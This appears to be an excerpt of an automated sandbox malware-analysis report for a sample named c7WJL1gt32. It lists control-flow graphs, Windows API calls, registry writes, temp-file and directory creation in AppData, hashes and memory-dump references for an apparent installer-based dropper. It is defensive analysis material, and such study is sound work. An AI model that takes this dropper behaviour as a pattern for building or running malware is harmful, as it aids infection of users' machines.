                                                                                                          • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 968 40678c-4067bf wsprintfW LoadLibraryExW 966->968 967->966 969 406785-406787 967->969 969->968
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                          • wsprintfW.USER32 ref: 004067A4
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 970 40591f-40596a CreateDirectoryW 971 405970-40597d GetLastError 970->971 972 40596c-40596e 970->972 973 405997-405999 971->973 974 40597f-405993 SetFileSecurityW 971->974 972->973 974->972 975 405995 GetLastError 974->975 975->973
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                          • GetLastError.KERNEL32 ref: 00405976
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                          • GetLastError.KERNEL32 ref: 00405995
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                          • API String ID: 3449924974-224404859
                                                                                                          • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                          • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                          • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                          • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1017 6cf11777-6cf117b6 call 6cf11b5f 1021 6cf118d6-6cf118d8 1017->1021 1022 6cf117bc-6cf117c0 1017->1022 1023 6cf117c2-6cf117c8 call 6cf12352 1022->1023 1024 6cf117c9-6cf117d6 call 6cf12394 1022->1024 1023->1024 1029 6cf11806-6cf1180d 1024->1029 1030 6cf117d8-6cf117dd 1024->1030 1031 6cf1182d-6cf11831 1029->1031 1032 6cf1180f-6cf1182b call 6cf12569 call 6cf115b4 call 6cf11272 GlobalFree 1029->1032 1033 6cf117f8-6cf117fb 1030->1033 1034 6cf117df-6cf117e0 1030->1034 1038 6cf11833-6cf1187c call 6cf115c6 call 6cf12569 1031->1038 1039 6cf1187e-6cf11884 call 6cf12569 1031->1039 1055 6cf11885-6cf11889 1032->1055 1033->1029 1040 6cf117fd-6cf117fe call 6cf12d37 1033->1040 1036 6cf117e2-6cf117e3 1034->1036 1037 6cf117e8-6cf117e9 call 6cf12aac 1034->1037 1043 6cf117f0-6cf117f6 call 6cf12724 1036->1043 1044 6cf117e5-6cf117e6 1036->1044 1051 6cf117ee 1037->1051 1038->1055 1039->1055 1048 6cf11803 1040->1048 1054 6cf11805 1043->1054 1044->1029 1044->1037 1048->1054 1051->1048 1054->1029 1059 6cf118c6-6cf118cd 1055->1059 1060 6cf1188b-6cf11899 call 6cf1252c 1055->1060 1059->1021 1065 6cf118cf-6cf118d0 GlobalFree 1059->1065 1067 6cf118b1-6cf118b8 1060->1067 1068 6cf1189b-6cf1189e 1060->1068 1065->1021 1067->1059 1070 6cf118ba-6cf118c5 call 6cf1153d 1067->1070 1068->1067 1069 6cf118a0-6cf118a8 1068->1069 1069->1067 1071 6cf118aa-6cf118ab FreeLibrary 1069->1071 1070->1059 1071->1067
                                                                                                          APIs
                                                                                                            • Part of subcall function 6CF11B5F: GlobalFree.KERNEL32(?), ref: 6CF11DB2
                                                                                                            • Part of subcall function 6CF11B5F: GlobalFree.KERNEL32(?), ref: 6CF11DB7
                                                                                                            • Part of subcall function 6CF11B5F: GlobalFree.KERNEL32(?), ref: 6CF11DBC
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF11825
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6CF118AB
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6CF118D0
                                                                                                            • Part of subcall function 6CF12352: GlobalAlloc.KERNEL32(?,?), ref: 6CF12383
                                                                                                            • Part of subcall function 6CF12724: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6CF117F6,00000000), ref: 6CF127F4
                                                                                                            • Part of subcall function 6CF115C6: wsprintfW.USER32 ref: 6CF115F4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                          • Opcode ID: 715a9c8c5ab1985b230f4bfa618b647e7f1981ae0a8f18ce7f34ab238b9f2193
                                                                                                          • Instruction ID: bda5be0d290a38b8bd20dfbc85822293837c39ca761230cf2604bb7e27304f7d
                                                                                                          • Opcode Fuzzy Hash: 715a9c8c5ab1985b230f4bfa618b647e7f1981ae0a8f18ce7f34ab238b9f2193
                                                                                                          • Instruction Fuzzy Hash: 9041F3719082059ADF108FB4D888BC637B8BF1632CF24C135E9159AE86DB79C188C760

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1074 4032de-403306 GetTickCount 1075 403436-40343e call 402e8e 1074->1075 1076 40330c-403337 call 40345d SetFilePointer 1074->1076 1081 403440-403444 1075->1081 1082 40333c-40334e 1076->1082 1083 403350 1082->1083 1084 403352-403360 call 403447 1082->1084 1083->1084 1087 403366-403372 1084->1087 1088 403428-40342b 1084->1088 1089 403378-40337e 1087->1089 1088->1081 1090 403380-403386 1089->1090 1091 4033a9-4033c5 call 406943 1089->1091 1090->1091 1093 403388-4033a8 call 402e8e 1090->1093 1096 403431 1091->1096 1097 4033c7-4033cf 1091->1097 1093->1091 1099 403433-403434 1096->1099 1100 4033d1-4033d9 call 405f90 1097->1100 1101 4033f2-4033f8 1097->1101 1099->1081 1104 4033de-4033e0 1100->1104 1101->1096 1103 4033fa-4033fc 1101->1103 1103->1096 1105 4033fe-403411 1103->1105 1106 4033e2-4033ee 1104->1106 1107 40342d-40342f 1104->1107 1105->1082 1108 403417-403426 SetFilePointer 1105->1108 1106->1089 1109 4033f0 1106->1109 1107->1099 1108->1075 1109->1105
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                            • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                          • SetFilePointer.KERNELBASE(0016A154,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer$CountTick
                                                                                                          • String ID: ogram cannot be run in DOS mode.$
                                                                                                          • API String ID: 1092082344-3978178379
                                                                                                          • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                          • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                          • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                          • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1110 402032-40203e 1111 402044-40205a call 402c41 * 2 1110->1111 1112 4020fd-4020ff 1110->1112 1123 40206a-402079 LoadLibraryExW 1111->1123 1124 40205c-402068 GetModuleHandleW 1111->1124 1113 40224b-402250 call 401423 1112->1113 1120 402ac5-402ad4 1113->1120 1121 40288b-402892 1113->1121 1121->1120 1126 40207b-40208a call 406831 1123->1126 1127 4020f6-4020f8 1123->1127 1124->1123 1124->1126 1130 4020c5-4020ca call 405450 1126->1130 1131 40208c-402092 1126->1131 1127->1113 1135 4020cf-4020d2 1130->1135 1133 402094-4020a0 call 401423 1131->1133 1134 4020ab-4020be call 6cf11777 1131->1134 1133->1135 1143 4020a2-4020a9 1133->1143 1138 4020c0-4020c3 1134->1138 1135->1120 1139 4020d8-4020e2 call 403a78 1135->1139 1138->1135 1139->1120 1144 4020e8-4020f1 FreeLibrary 1139->1144 1143->1135 1144->1120
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                          • String ID: h"s
                                                                                                          • API String ID: 334405425-3610977580
                                                                                                          • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                          • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                          • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                          • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse90B2.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse90B2.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseValuelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse90B2.tmp
                                                                                                          • API String ID: 2655323295-3845316240
                                                                                                          • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                          • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                          • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                          • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF), ref: 00405F46
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                          • API String ID: 1716503409-678247507
                                                                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                          • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                          • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                          APIs
                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$Enum
                                                                                                          • String ID:
                                                                                                          • API String ID: 464197530-0
                                                                                                          • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                          • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                          • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                          • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405D76
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                                                                                            • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Bombestoppets,?,00000000,?), ref: 0040164D
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Iw\Bombestoppets, xrefs: 00401640
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                          • String ID: C:\Users\user\AppData\Local\Iw\Bombestoppets
                                                                                                          • API String ID: 1892508949-542753526
                                                                                                          • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                          • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                          • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                          • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                            • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                          • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                          • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                          • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                          • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseQueryValue
                                                                                                          • String ID: Call
